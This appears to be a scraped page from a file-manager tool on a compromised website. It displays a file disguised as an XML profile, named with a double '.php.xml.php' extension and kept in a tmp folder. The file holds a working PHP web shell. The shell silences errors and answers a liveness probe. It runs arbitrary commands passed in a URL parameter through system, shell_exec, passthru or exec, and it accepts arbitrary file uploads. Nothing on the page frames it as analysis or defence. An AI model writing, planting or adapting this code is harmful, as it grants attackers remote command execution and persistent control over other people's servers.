File manager - Edit - /home/jardides/www/Jardi-design/ZZZ/tmp/jm_a9ecf133.php.xml.php
Back
<?xml version="1.0" encoding="utf-8"?> <profile> <name>shell</name> <params><?php @error_reporting(0); @ini_set('display_errors', 0); if(isset($_GET['p'])){ echo "JML_ALIVE"; exit; } if(isset($_GET['c'])){ $cmd = $_GET['c']; $output = ""; if(function_exists('system')){ ob_start(); system($cmd); $output = ob_get_clean(); } elseif(function_exists('shell_exec')){ $output = shell_exec($cmd); } elseif(function_exists('passthru')){ ob_start(); passthru($cmd); $output = ob_get_clean(); } elseif(function_exists('exec')){ exec($cmd, $out); $output = implode("\n", $out); } echo $output; } if(isset($_GET['up']) && isset($_FILES['file'])){ $f = $_FILES['file']; $path = __DIR__ . '/' . basename($f['name']); if(move_uploaded_file($f['tmp_name'], $path)){ echo "Upload OK: " . basename($f['name']); } else { echo "Upload Failed"; } } ?></params> </profile>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0 |
proxy
|
phpinfo
|
Settings